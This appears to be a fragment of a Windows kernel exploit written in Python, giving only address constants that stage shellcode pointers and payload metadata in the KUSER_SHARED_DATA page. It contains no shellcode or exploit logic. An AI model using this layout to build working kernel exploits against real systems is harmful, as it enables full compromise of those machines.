KUSER_SHARED_DATA = 0xFFFFF78000000000
KUSER_SHARED_DATA_TOP = KUSER_SHARED_DATA + 0x1000

MDL_MAP_VA = KUSER_SHARED_DATA_TOP - 32

SHELLCODE_VA_PTR = MDL_MAP_VA - 8 - 8

EXEC_HANDLERS_PTR = SHELLCODE_VA_PTR - 2*8

SHELLCODE_TOP = EXEC_HANDLERS_PTR

SHELLCODE_STATUS_PTR = SHELLCODE_TOP - 4
SHELLCODE_PAYLOAD_ENTRY_RVA_PTR = SHELLCODE_STATUS_PTR - 4
SHELLCODE_PAYLOAD_BASE_PTR = SHELLCODE_PAYLOAD_ENTRY_RVA_PTR - 8
SHELLCODE_PAYLOAD_LEN_PTR = SHELLCODE_PAYLOAD_BASE_PTR - 8
